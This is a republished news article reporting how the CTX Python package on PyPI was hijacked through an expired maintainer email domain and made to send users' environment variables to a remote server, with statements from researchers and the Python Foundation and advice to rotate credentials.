Connect with us

Hi, what are you looking for?

Cyber Security

Malicious Python library CTX removed from PyPI repo

A malicious and potentially hijacked Python package, CTX, has been removed from the Python Package Index (PyPI) repository after social media users alerted the team to its presence.

On May 24, Indian hacker Somdev Sangwan alerted developers on Twitter to a potential security issue impacting Python’s CTX library. In a tweet, Sangwan said:

Python’s CTX library and a fork of PHP’s phpass have been compromised. Three million users combined. The malicious code sends all the environment variables to a Heroku app, likely to mine AWS credentials.

Environmental variables can also include other forms of credentials and API keys.

The researcher was first made aware of the problematic package on a Reddit thread.

Malicious update

On May 22, a Reddit user with the moniker SocketPuppets said there had been a new update to CTX, a project hosted on both GitHub and PyPI.

The GitHub repository for the original project, designed for simple dictionary item queries using dot notation software for Python, has not been updated for roughly eight years.

“The OP [original poster] said it was recently updated, and on PyPI it was updated as of May 21,” Sangwan noted. “But the GitHub repo does not reflect any changes.”

He was not the only one to question the update. On the Reddit thread, users queried why environmental variables were sent to a URL – https://web.herokuapp.com/hacked – after examining the open source project’s source code and why the GitHub repository had not been updated.

SocketPuppets said: “I created a new company account and repository for new versions so the source will be totally changed.”

SockPuppets’ post history leads to a Medium blog and contact details potentially linking them to other GitHub repositories under the name ‘aydinnyunuss’.

As noted by Reddit user ‘antipsychosis’, the GitHub account belonging to this name, apparently belonging to a developer/student from Istanbul’s Commerce University, is the creator of GateCracker. This software also pings requests to Heroku apps.

Expired domain

The individual responsible for uploading the malicious package to PyPI exploited an expired domain, purchased the name, and then obtained ownership of the email address registered to the original repository.

In other words, they did so to send a password retrieval email to themselves and masquerade as the original project maintainer.

Sangwan also found evidence of a phpass compromise. In total, the impacted packages have been downloaded an estimated three million times, but only users who have downloaded them within the last week or so appear to be impacted.

Advertisement. Scroll to continue reading.

The CTX package, as well as other impacted libraries, have since been removed from the repository.

The Python Foundation told The Daily Swig that the compromise “was of a single user account due to re-registration over an expired domain.

“The domain that hosted the users email address was re-registered 2022-05-14T18:40:05Z and a password reset completed successfully for the user at 2022-05-14T18:52:40Z,” the organization added. “Original releases were then deleted and malicious copies uploaded.”

PyPI itself was not directly compromised.

In a subsequent write-up, the foundation noted that users who installed the CTX package between May 14 and May 24, 2022 were impacted. If user environment variables contain sensitive data, the organization advises the rotation of passwords and keys.

SocketPuppets/aydinnyunuss has not responded to requests for comment.

The Daily Swig has reached out to the CTX project maintainers and we will update if and when we hear back.

Source: https://portswigger.net/daily-swig/malicious-python-library-ctx-removed-from-pypi-repo

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies three weeks to secure Adobe ColdFusion servers on their networks against two...

Cyber Security

Businesses and developers are focusing more on the security of applications in their digital environment as cyber threats and data breaches continue escalating. The...

Cyber Security

HCL BigFix is an endpoint management platform that has the capability to automate discovery, management, and remediation. It can find and fix vulnerabilities on...

Cyber Security

The Environmental Protection Agency cited a lack of resources and the sheer volume of critical vulnerabilities as the reasons for its inability to patch...

Copyright © 2023 Newsworthy News | Global | Political | Local | All News | Website By: Top Search SEO